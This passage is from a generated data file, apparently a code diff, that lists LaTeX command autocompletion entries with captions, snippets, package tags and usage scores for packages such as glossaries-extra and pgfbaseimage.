'\\noexpand', + snippet: '\\noexpand', + meta: 'kvoptions-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'kvoptions-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'kvoptions-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'kvoptions-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'kvoptions-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'kvoptions-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'kvoptions-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'kvoptions-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'kvoptions-cmd', + score: 0.021170869458413965, + }, + ], + 'pst-tree': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-tree-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-tree-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-tree-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-tree-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-tree-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-tree-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-tree-cmd', + score: 0.006520475264573554, + }, + ], + nonfloat: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'nonfloat-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'nonfloat-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'nonfloat-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'nonfloat-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'nonfloat-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'nonfloat-cmd', + score: 0.0018957469739775527, + }, + ], + rsphrase: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'rsphrase-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'rsphrase-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'rsphrase-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'rsphrase-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'rsphrase-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'rsphrase-cmd', + score: 0.0018957469739775527, + }, + ], + beramono: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'beramono-cmd', + score: 0.00037306820619479756, + }, + ], + pgfbaseimage: [ + { + 
caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfbaseimage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfbaseimage-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfbaseimage-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfbaseimage-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfbaseimage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfbaseimage-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfbaseimage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfbaseimage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.000264339771769041, + }, 
+ { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfbaseimage-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfbaseimage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfbaseimage-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfbaseimage-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfbaseimage-cmd', + score: 0.2864294797053033, + }, + ], + romannum: [ + { + caption: '\\thefootnote', + snippet: '\\thefootnote', + meta: 'romannum-cmd', + score: 0.007676927812687567, + }, + { + caption: '\\thefootnote{}', + snippet: '\\thefootnote{$1}', + meta: 'romannum-cmd', + score: 0.007676927812687567, + }, + ], + tgtermes: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgtermes-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgtermes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgtermes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgtermes-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgtermes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgtermes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgtermes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgtermes-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgtermes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgtermes-cmd', + score: 0.021170869458413965, + }, + ], + Alegreya: [ + { + caption: '\\rmfamily', + snippet: '\\rmfamily', + meta: 'Alegreya-cmd', + score: 0.00898937903263608, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'Alegreya-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'Alegreya-cmd', + score: 0.008565354665444157, + }, + ], + 'glossaries-extra': [ + { + caption: '\\gls{}', + snippet: '\\gls{$1}', + meta: 'glossaries-extra-cmd', + score: 0.06939353309055077, + }, + { + caption: '\\Gls{}', + snippet: '\\Gls{$1}', + meta: 'glossaries-extra-cmd', + score: 0.003696678698317109, + }, + { + caption: '\\makeglossaries', + snippet: '\\makeglossaries', + meta: 'glossaries-extra-cmd', + score: 0.0056737600836936995, + }, + { + caption: '\\newabbreviation{}{}{}', + snippet: '\\newabbreviation{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 0.00023275591440052114, + }, + { + caption: '\\newglossaryentry{}{}', + snippet: '\\newglossaryentry{$1}{$2}', + 
meta: 'glossaries-extra-cmd', + score: 0.018524394136900962, + }, + { + caption: '\\newglossary{}{}', + snippet: '\\newglossary{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 1.4547244650032571e-5, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\glslongpluralkey', + snippet: '\\glslongpluralkey', + meta: 'glossaries-extra-cmd', + score: 1.4538687447297259e-5, + }, + { + caption: '\\Glspl{}', + snippet: '\\Glspl{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0025291265119320736, + }, + { + caption: '\\glossarysection', + snippet: '\\glossarysection', + meta: 'glossaries-extra-cmd', + score: 9.579755294730752e-5, + }, + { + caption: '\\printglossaries', + snippet: '\\printglossaries', + meta: 'glossaries-extra-cmd', + score: 0.0010106582768889887, + }, + { + caption: '\\Gls{}', + snippet: '\\Gls{$1}', + meta: 'glossaries-extra-cmd', + score: 0.003696678698317109, + }, + { + caption: '\\setglossarystyle{}', + snippet: '\\setglossarystyle{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0003758893277679221, + }, + { + caption: '\\printglossary', + snippet: '\\printglossary', + meta: 'glossaries-extra-cmd', + score: 0.009139682306158714, + }, + { + caption: '\\printglossary[]', + snippet: '\\printglossary[$1]', + meta: 'glossaries-extra-cmd', + score: 0.009139682306158714, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-extra-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\setglossarysection{}', + snippet: '\\setglossarysection{$1}', + meta: 'glossaries-extra-cmd', + score: 3.6081414102781514e-5, + }, + { + caption: '\\glsresetall', + snippet: '\\glsresetall', + meta: 'glossaries-extra-cmd', + score: 0.0006123462672467326, + }, + { + caption: '\\the', + snippet: '\\the', + meta: 'glossaries-extra-cmd', + score: 0.007238960303946444, + }, + { + caption: '\\acrshort{}', + snippet: '\\acrshort{$1}', + meta: 'glossaries-extra-cmd', + score: 0.009936841864059727, + }, + { + caption: '\\printnoidxglossary[]', + snippet: '\\printnoidxglossary[$1]', + meta: 'glossaries-extra-cmd', + score: 0.00021912375285685037, + }, + { + caption: '\\newglossary{}{}', + snippet: '\\newglossary{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 1.4547244650032571e-5, + }, + { + caption: '\\gls{}', + snippet: '\\gls{$1}', + meta: 'glossaries-extra-cmd', + score: 0.06939353309055077, + }, + { + caption: '\\printnoidxglossaries', + snippet: '\\printnoidxglossaries', + meta: 'glossaries-extra-cmd', + score: 5.6789564226023136e-5, + }, + { + caption: '\\printindex', + snippet: '\\printindex', + meta: 'glossaries-extra-cmd', + score: 0.004417016910870522, + }, + { + caption: '\\defglsentryfmt[]{}', + snippet: '\\defglsentryfmt[$1]{$2}', + meta: 'glossaries-extra-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\glspostdescription', + snippet: '\\glspostdescription', + meta: 'glossaries-extra-cmd', + score: 0.0006337376579591112, + }, + { + caption: '\\number', + snippet: '\\number', + meta: 'glossaries-extra-cmd', + score: 0.000968714260809983, + }, + { + caption: '\\glsaddall', + 
snippet: '\\glsaddall', + meta: 'glossaries-extra-cmd', + score: 0.0008363820557740373, + }, + { + caption: '\\glsaddall[]', + snippet: '\\glsaddall[$1]', + meta: 'glossaries-extra-cmd', + score: 0.0008363820557740373, + }, + { + caption: '\\makeglossaries', + snippet: '\\makeglossaries', + meta: 'glossaries-extra-cmd', + score: 0.0056737600836936995, + }, + { + caption: '\\glossaryname', + snippet: '\\glossaryname', + meta: 'glossaries-extra-cmd', + score: 0.0006174536302752427, + }, + { + caption: '\\newglossaryentry{}{}', + snippet: '\\newglossaryentry{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.018524394136900962, + }, + { + caption: '\\glslabel', + snippet: '\\glslabel', + meta: 'glossaries-extra-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\glsadd{}', + snippet: '\\glsadd{$1}', + meta: 'glossaries-extra-cmd', + score: 3.0150373480213892e-5, + }, + { + caption: '\\makenoidxglossaries', + snippet: '\\makenoidxglossaries', + meta: 'glossaries-extra-cmd', + score: 0.0001382210125680805, + }, + { + caption: '\\glsgenentryfmt', + snippet: '\\glsgenentryfmt', + meta: 'glossaries-extra-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\acronymtype', + snippet: '\\acronymtype', + meta: 'glossaries-extra-cmd', + score: 0.002000834271117562, + }, + { + caption: '\\acrfull{}', + snippet: '\\acrfull{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0032622587277765067, + }, + { + caption: '\\newacronym{}{}{}', + snippet: '\\newacronym{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 0.03193935544723102, + }, + { + caption: '\\glspl{}', + snippet: '\\glspl{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0034025897522047717, + }, + { + caption: '\\ifglsused{}{}{}', + snippet: '\\ifglsused{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\acrlong{}', + snippet: '\\acrlong{$1}', + meta: 'glossaries-extra-cmd', + score: 0.002517821598213752, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'glossaries-extra-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-extra-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'glossaries-extra-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'glossaries-extra-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'glossaries-extra-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'glossaries-extra-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'glossaries-extra-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + 
{ + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'glossaries-extra-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'glossaries-extra-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'glossaries-extra-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'glossaries-extra-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'glossaries-extra-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'glossaries-extra-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'glossaries-extra-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'glossaries-extra-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'glossaries-extra-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'glossaries-extra-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'glossaries-extra-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'glossaries-extra-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'glossaries-extra-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'glossaries-extra-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'glossaries-extra-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'glossaries-extra-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'glossaries-extra-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'glossaries-extra-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'glossaries-extra-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'glossaries-extra-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'glossaries-extra-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'glossaries-extra-cmd', + score: 0.00011383372700282614, + }, + 
{ + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'glossaries-extra-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'glossaries-extra-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'glossaries-extra-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'glossaries-extra-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'glossaries-extra-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'glossaries-extra-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'glossaries-extra-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'glossaries-extra-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'glossaries-extra-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'glossaries-extra-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'glossaries-extra-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'glossaries-extra-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'glossaries-extra-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'glossaries-extra-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'glossaries-extra-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'glossaries-extra-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'glossaries-extra-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'glossaries-extra-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'glossaries-extra-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'glossaries-extra-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'glossaries-extra-cmd', + score: 
0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'glossaries-extra-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'glossaries-extra-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'glossaries-extra-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'glossaries-extra-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'glossaries-extra-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'glossaries-extra-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'glossaries-extra-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'glossaries-extra-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'glossaries-extra-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'glossaries-extra-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'glossaries-extra-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'glossaries-extra-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'glossaries-extra-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'glossaries-extra-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'glossaries-extra-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'glossaries-extra-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'glossaries-extra-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'glossaries-extra-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'glossaries-extra-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'glossaries-extra-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'glossaries-extra-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: 